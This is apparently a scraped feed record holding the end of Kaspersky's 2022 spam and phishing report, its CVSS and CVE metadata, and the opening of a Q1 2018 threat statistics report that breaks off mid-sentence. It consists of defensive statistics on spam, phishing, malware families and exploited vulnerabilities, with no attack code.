Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. The quietest month in Runet was December (47.18%), the same as globally.

### Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points.
Third place is still held by the United States (10.71%).

_TOP 20 countries and territories — sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That is an increase of 18 million from the previous year. This component was triggered most often in March, May, and June 2022.

_Number of Mail Anti-Virus hits, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), spread as archived electronic documents, moved down to third place. The fourth most common malware was exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than exploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) in the same component (1.80%).
The latter vulnerability was more widespread in 2021 and has now dropped to tenth place.

_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_

[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut it down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.

_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

### Countries and territories targeted by malicious mailings

Spain remained the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%).
The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share of the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%); it was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh.
Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

| **Country/territory** | **Share of attacked users*** |
|---|---|
| Vietnam | 17.03% |
| Macau | 13.88% |
| Madagascar | 12.04% |
| Algeria | 11.05% |
| Ecuador | 11.05% |
| Malawi | 10.91% |
| Brunei | 10.59% |
| Brazil | 10.57% |
| Morocco | 10.43% |
| Portugal | 10.33% |

**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), its share also decreasing. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

The ORG (3.89%) and TOP (1.80%) domains swapped places relative to 2021 but remained in fourth and fifth places. In addition, the top ten domain zones most in demand among cybercriminals included RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers.
The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger's users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. 
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. 
The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. 
Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we've seen an increase in targeted phishing attacks where scammers don't immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. 
New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:49", "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File 
Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. 
Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. 
Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). 
Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. 
The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a familiar set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. Fine print at the bottom states that the services are fee-based and that subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: it came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well as Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times fewer than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to revoke those rights. If no PIN is set (a graphic, numeric, or biometric lock also counts), the device is locked. In this case, the only way to restore the smartphone to working order is a factory reset.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, which had held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000). \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that the situation can only be compared to the number of Adobe Flash vulnerabilities found in the past. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances, with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
